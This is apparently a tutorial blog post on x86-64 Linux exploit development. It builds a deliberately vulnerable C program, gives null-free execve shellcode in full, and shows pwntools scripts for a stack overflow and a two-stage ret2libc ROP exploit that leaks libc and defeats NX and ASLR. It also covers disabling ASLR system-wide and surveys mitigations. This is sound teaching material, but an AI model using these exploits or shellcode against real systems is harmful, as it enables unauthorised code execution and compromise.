Today’s post we’re gonna walk through exploit development on x86-64 Linux from the ground up. We’ll start with a basic stack overflow, write shellcode, pop a shell, then watch every mitigation kill our exploit one by one. Then we bypass them.
The old-school 32-bit stuff still gets taught everywhere, but the reality is nobody’s running 32-bit anymore. The calling conventions are different, the syscall interface is different, the mitigations are different. Is this the most advanced exploitation technique out there? No. But if you don’t understand what’s happening at this level, you’re ain’ gonna understand anything that comes after it. This is the foundation everything else builds on.
Before we break anything, we need to know what we’re breaking, So a process on Linux has its virtual memory laid out roughly like this:
high addresses
+------------------+
| stack | <- grows DOWN (toward lower addresses)
| | |
| v |
| |
| ^ |
| | |
| heap | <- grows UP (malloc, ...)
+------------------+
| .bss | <- uninitialized globals
+------------------+
| .data | <- initialized globals
+------------------+
| .text | <- your code (instructions)
+------------------+
low addresses
The stack is where function calls live. Every time you call a function, a new stack frame gets pushed. That frame contains the function’s local variables, the saved base pointer (RBP) so the caller’s frame can be restored, and the return address, where execution continues after the function returns.
On x86-64, the key registers:
| Register | Purpose |
|---|---|
| RIP | Instruction pointer; address of the next instruction to execute |
| RSP | Stack pointer; points to the top of the stack |
| RBP | Base pointer; points to the base of the current stack frame |
| RAX | Return value; also used for syscall number |
| RDI, RSI, RDX, RCX, R8… | Function arguments (in order) |
This is the System V AMD64 ABI calling convention. Function arguments go in registers, not on the stack like 32-bit x86. This matters a lot for exploit dev because it means we can’t just throw arguments on the stack and hope the function picks them up. We need to load registers explicitly, which is where ROP gadgets come in later.
When vuln() gets called, the stack frame looks like:
low addresses
+------------------+
RSP --> | buf[64] | <- local buffer (64 bytes)
+------------------+
| saved RBP | <- 8 bytes (64-bit)
+------------------+
| return address | <- 8 bytes. THIS is our target
+------------------+
| caller's frame |
+------------------+
high addresses
If we write more than 64 bytes into buf, we overflow into the saved RBP (8 bytes), and then into the return address. Control that return address, control execution. That’s the whole game.
#include <stdio.h>
#include <unistd.h>
void vuln() {
char buf[64];
printf("buf @ %p\n", buf);
read(0, buf, 256); // reads up to 256 bytes into a 64-byte buffer
}
int main() {
vuln();
printf("returned normally\n");
return 0;
}
read() will happily write 256 bytes into a 64-byte buffer. Classic overflow. The compiler will warn you about it, the linker will warn you about it, and we’re gonna ignore all of it.
Compile with all protections off:
$ gcc -o vuln vuln.c -fno-stack-protector -z execstack -no-pie -g
What those flags do:
| flag | what it disables |
|---|---|
-fno-stack-protector |
stack canaries |
-z execstack |
NX (makes stack executable) |
-no-pie |
PIE/ASLR for the binary |
-g |
adds debug symbols |
Also disable system-wide ASLR:
# echo 0 > /proc/sys/kernel/randomize_va_space
Normal run:
$ echo "AAAA" | ./vuln
buf @ 0x7ffffffc3b20
returned normally
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault
Overflow:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault
Dead. We wrote past the buffer, trashed the return address, and the process tried to jump to 0x4141414141414141. That’s not a valid address, so it crashed. But what if we put a real address there? The buffer is 64 bytes. Saved RBP is 8 bytes. So the return address starts at offset 72 from the start of the buffer.
We can confirm this with pwntools. The idea is simple try different offsets, overwrite the return address with the address of main(), and see which offset makes the program loop back instead of crashing:
from pwn import *
context.arch = "amd64"
elf = ELF("./vuln", checksec=False)
for off in range(64, 96, 8):
p = process("./vuln")
p.recvuntil(b"buf @ ")
p.recvline()
payload = b"A" * off + p64(elf.symbols["main"])
p.sendline(payload)
try:
resp = p.recv(timeout=2)
if b"buf @" in resp:
print(f"offset {off}: HIT - redirected to main()")
p.close()
break
except:
print(f"offset {off}: crash")
p.close()
offset 64: crash
offset 72: redirected to main()
Offset 72. We overwrote the return address with the address of main(), and the program looped back instead of dying. That’s RIP control.
Writing x86-64 Shellcode
This is where 32-bit and 64-bit diverge hard. On 32-bit x86, you’d use int 0x80 with syscall numbers in EAX and args in EBX/ECX/EDX. On x86-64, everything changes:
| | 32-bit (x86) | 64-bit (x86-64) |
| ——————- | ———— | ————— |
| syscall instruction | int 0x80 | syscall |
| syscall number | EAX | RAX |
| arg 1 | EBX | RDI |
| arg 2 | ECX | RSI |
| arg 3 | EDX | RDX |
| execve number | 11 | 59 (0x3b) |
If you try to use 32-bit syscall conventions on a 64-bit system, it’ll technically work (the kernel still supports int 0x80 for backwards compat) but you’ll be operating in 32-bit compatibility mode with truncated addresses. Don’t do it. Use syscall.
We want execve("/bin/sh", NULL, NULL). In assembly:
; x86-64 execve("/bin/sh", NULL, NULL) - null-free shellcode
; 28 bytes
section .text
global _start
_start:
xor rdx, rdx ; rdx = 0 (envp = NULL)
xor rsi, rsi ; rsi = 0 (argv = NULL)
push rsi ; push null terminator onto stack
mov rdi, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rdi ; push string onto stack
mov rdi, rsp ; rdi = pointer to "/bin//sh\0"
xor rax, rax
mov al, 0x3b ; syscall 59 = execve
syscall
Let’s break down the tricks:
-
xor reg, regzeros a register without producing null bytes.mov rax, 0would assemble to48 c7 c0 00 00 00 00, seven bytes with four nulls.xor rax, raxis48 31 c0, three bytes, zero nulls. -
We use
"/bin//sh"instead of"/bin/sh"because it’s exactly 8 bytes, fits in a single 64-bit register. The double slash is ignored by the kernel,/bin//shresolves the same as/bin/sh. -
mov al, 0x3binstead ofmov rax, 59because we already zeroed RAX with xor, so we only need to set the low byte. Avoids nulls. -
The string goes on the stack via
push. No data segment needed, the shellcode is fully self-contained.
Assemble and extract:
$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o
$ objcopy -O binary -j .text shell shell.bin
$ xxd shell.bin
00000000: 4831 d248 31f6 5648 bf2f 6269 6e2f 2f73 H1.H1.VH./bin//s
00000010: 6857 4889 e748 31c0 b03b 0f05 hWH..H1..;..
28 bytes. Null-free. Let’s verify it actually works:
$ ./shell
$ id
uid=0(root) gid=0(root) groups=0(root)
The shellcode as a byte string:
\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73
\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05
Now we put it together. We place the shellcode at the start of the buffer, pad to 72 bytes, then overwrite the return address with the address of buf itself. When the function returns, RIP jumps to our buffer and executes the shellcode.
"""
[shellcode (28 bytes)] [NOP padding (44 bytes)] [return addr -> buf (8 bytes)]
^ |
|_______________________________________________|
"""
from pwn import *
context.arch = "amd64"
shellcode = (
b"\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
b"\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05"
)
OFFSET = 72
p = process("./vuln")
p.recvuntil(b"buf @ ")
buf_addr = int(p.recvline().strip(), 16)
payload = shellcode # 28 bytes
payload += b"\x90" * (OFFSET - len(shellcode)) # 44 bytes NOP padding
payload += p64(buf_addr) # 8 bytes -> jump to buf
log.info(f"buf @ {hex(buf_addr)}")
p.sendline(payload)
p.interactive()
Root shell. The program was supposed to read some input and return. Instead it’s running /bin/sh with whatever privileges the binary has.
[*] buf @ 0x7ffffffc3ab0
[*] payload: 28b sc + 44b nops + 8b ret -> 0x7ffffffc3ab0
[+] got shell:
uid=0(root) gid=0(root) groups=0(root)
This is the baseline. This is how it worked in the early 2000s. Now let’s see why shit won’t cut anymore, So compile the same program with modern defaults and our exploit dies in multiple ways. Let’s go through them one at a time.
NX (No-eXecute)
$ gcc -o vuln_nx vuln.c -fno-stack-protector -no-pie
NX marks the stack as non-executable. Our shellcode lands on the stack, the CPU tries to execute it, and the hardware says no. Process killed. This is enforced at the hardware level via the NX bit in the page table entries. You can’t software your way around it.
buf @ 0x7ffffffc39d0
process killed
The shellcode is there in memory, sitting right where we put it. But the page permissions won’t let it run.
Stack Canaries
$ gcc -o vuln_canary vuln.c -fstack-protector-all -z execstack -no-pie
The compiler inserts a random value (the “canary”) between the local variables and the saved RBP/return address. Before the function returns, it checks if the canary was modified. If it was, the overflow is detected and the process aborts.
The stack frame now looks like:
+------------------+
| buf[64] |
+------------------+
| canary (8b) | <- random value, checked before return
+------------------+
| saved RBP |
+------------------+
| return address |
+------------------+
To overflow into the return address, you have to overwrite the canary. The check catches it. Game over. Unless you can leak the canary value first, but that’s a different conversation.
ASLR (Address Space Layout Randomization)
# echo 2 > /proc/sys/kernel/randomize_va_space
ASLR randomizes the base addresses of the stack, heap, and shared libraries every time the program runs. Our hardcoded return address is now wrong:
run 1: buf @ 0x7ffffffc3aa0
run 2: buf @ 0x7ffffffc3bb0
run 3: buf @ 0x7ffffffc39d0
run 4: buf @ 0x7ffffffc3ad0
run 5: buf @ 0x7ffffffc3a00
-> address changes every run. hardcoded ret addr = crash
PIE (Position Independent Executable)
PIE randomizes the base address of the binary itself. Now even the addresses of functions in the binary (main, vuln, PLT entries) change every run. Combined with ASLR, nothing has a fixed address.
Full RELRO
Full RELRO makes the Global Offset Table (GOT) read-only after the dynamic linker resolves all symbols. This prevents GOT overwrite attacks, where you’d replace a function pointer in the GOT to redirect execution.
What Defaults Looks Like ?
Compile with zero flags on Ubuntu 22.04:
$ gcc -o vuln vuln.c
$ checksec vuln
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Everything is on by default. SHSTK (Shadow Stack) and IBT (Indirect Branch Tracking) are Intel CET features, hardware-level control flow integrity. Shadow stack keeps a separate copy of return addresses that the attacker can’t touch. IBT requires indirect jumps to land on endbr64 instructions, which limits where you can redirect execution.
Our classical exploit is dead six different ways. Time to evolve.
Bypassing NX with ret2libc
If we can’t execute code on the stack, we use code that already exists in memory. libc is loaded into every dynamically linked process and contains system(), which executes shell commands. If we can call system("/bin/sh"), we get a shell without any shellcode on the stack.
The problem is on x86-64, function arguments go in registers, not on the stack. We can’t just place "/bin/sh" on the stack and hope system() picks it up. We need to load the address of "/bin/sh" into RDI before calling system().
This is where ROP gadgets come in. A gadget is a short sequence of instructions ending in ret that we can chain together by placing addresses on the stack. Each ret pops the next address off the stack and jumps to it, creating a chain of execution. The gadget we need:
/* pop rdi ; ret ; pops the next value from the stack into RDI, then returns */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void setup() {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
}
// provides ROP gadgets in the binary
void __attribute__((used)) gadgets() {
asm volatile(
"pop %rdi; ret\n"
"pop %rsi; pop %r15; ret\n"
);
}
void vuln() {
char buf[64];
puts("give me input:");
read(0, buf, 256);
}
int main() {
setup();
vuln();
return 0;
}
A note on the gadgets() function gcc with CET doesn’t emit the classic __libc_csu_init that used to provide free ROP gadgets in every binary. Back in the day you’d get pop rdi; ret for free in basically every ELF. Not anymore. In real-world exploitation you’d find gadgets in libc or other loaded libraries using ROPgadget or ropper. Here we embed them for clarity.
Compile with NX on, no canary, no PIE:
$ gcc -o vuln2 vuln2.c -fno-stack-protector -no-pie -fcf-protection=none
$ checksec vuln2
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Find our gadgets:
$ ROPgadget --binary vuln2 | grep "pop rdi"
0x000000000040118d : pop rdi ; ret
The Two-Stage Exploit
This exploit works in two stages. Why two? Because we need to know where libc is loaded in memory, and we don’t know that until runtime.
So first call puts(puts@GOT). The GOT entry for puts contains its runtime address in libc. By printing it, we learn where libc is loaded. Then we return to main() so we get a second input.
then call system(“/bin/sh”). now that we know libc’s base address, we calculate the addresses of system() and the "/bin/sh" string in libc, and build a ROP chain to call system("/bin/sh").
The stack layouts:
stage 1: stage 2:
+------------------+ +------------------+
| "A" * 72 | | "A" * 72 |
+------------------+ +------------------+
| pop rdi; ret | | ret | <- stack alignment
+------------------+ +------------------+
| puts@GOT | | pop rdi; ret |
+------------------+ +------------------+
| puts@PLT | | "/bin/sh" addr |
+------------------+ +------------------+
| main | | system() |
+------------------+ +------------------+
That ret gadget before pop rdi in stage 2 is for stack alignment. The System V ABI requires the stack to be 16-byte aligned before a call instruction. Without it, system() will segfault on a movaps instruction inside libc. This trips up a lot of people. If your ROP chain segfaults for no obvious reason, try adding a ret gadget before the function call.
The Exploit
from pwn import *
context.arch = "amd64"
elf = ELF("./vuln2", checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
OFFSET = 72
POP_RDI = 0x40118d
RET = POP_RDI + 1 # 0x40118e
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main = elf.symbols["main"]
# leak libc
p = process("./vuln2")
p.recvuntil(b"give me input:\n")
payload = b"A" * OFFSET
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(puts_got) # rdi = puts@GOT (runtime addr of puts)
payload += p64(puts_plt) # call puts() to print it
payload += p64(main) # return to main for stage 2
p.send(payload)
leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh"))
log.info(f"leaked puts @ {hex(leaked)}")
log.info(f"libc base @ {hex(libc.address)}")
log.info(f"system() @ {hex(system)}")
log.info(f"/bin/sh @ {hex(binsh)}")
# system("/bin/sh")
p.recvuntil(b"give me input:\n")
payload2 = b"A" * OFFSET
payload2 += p64(RET) # stack alignment
payload2 += p64(POP_RDI) # pop rdi; ret
payload2 += p64(binsh) # rdi = "/bin/sh"
payload2 += p64(system) # call system()
p.send(payload2)
p.interactive()
[*] leaked puts @ 0x7fffff615e50
[*] libc base @ 0x7fffff595000
[*] system() @ 0x7fffff5e5d70
[*] /bin/sh @ 0x7fffff76d678
[+] shell popped:
uid=0(root) gid=0(root) groups=0(root)
No shellcode on the stack. No executable stack needed. We used code that was already in memory. NX is completely irrelevant to this technique.
Bypassing ASLR + NX
Here’s the thing the same exploit works with ASLR on. The binary itself is not PIE (fixed at 0x400000), so our gadget addresses and PLT/GOT addresses don’t change. Only libc moves around, and we leak its address at runtime. That’s the whole point of the two-stage approach.
# echo 2 > /proc/sys/kernel/randomize_va_space
[*] ret2libc with ASLR ON
[*] binary is no-PIE so code addrs are fixed
[*] but libc is randomized - we leak it at runtime
[*] leaked puts @ 0x7fffff615e50
[*] libc base @ 0x7fffff595000
[*] system() @ 0x7fffff5e5d70
[*] /bin/sh @ 0x7fffff76d678
[+] ASLR bypassed. shell popped:
uid=0(root) gid=0(root) groups=0(root)
Simply ASLR randomizes where things are loaded, but it doesn’t prevent you from reading those addresses at runtime. If you can leak a single libc address, you can calculate every other address in libc because the offsets between functions are fixed within a given libc version. One leak and the whole thing unravels.
So as of Today the exploit landscape has gotten significantly harder.
| mitigation | what it does | bypass |
|---|---|---|
| NX | non-executable stack | ret2libc, ROP |
| stack canaries | detect overflow before return | info leak to read canary, or don’t overflow past it |
| ASLR | randomize stack/heap/libc addresses | info leak (format string, partial overwrite, side channel) |
| PIE | randomize binary base address | info leak for binary addresses too |
| Full RELRO | GOT is read-only | can’t overwrite GOT entries, use other write targets |
| CET (SHSTK) | shadow stack for return addresses | still being researched, FineIBT bypass |
| CET (IBT) | indirect branches must land on endbr64 |
limits gadget availability but doesn’t eliminate ROP |
The pattern is that every mitigation makes exploitation harder but not impossible. The game has shifted from “inject and execute shellcode” to “chain together existing code fragments using leaked runtime information. Meaning ? :
- Find a bug (overflow, use-after-free, type confusion)
- Turn it into an info leak (defeat ASLR/PIE/canary)
- Build a ROP chain or corrupt a function pointer (defeat NX)
- Deal with RELRO, CFI, CET as needed
The bar is higher. The bugs are rarer. But the fundamental principle hasn’t changed much if you control what gets written where, you control execution.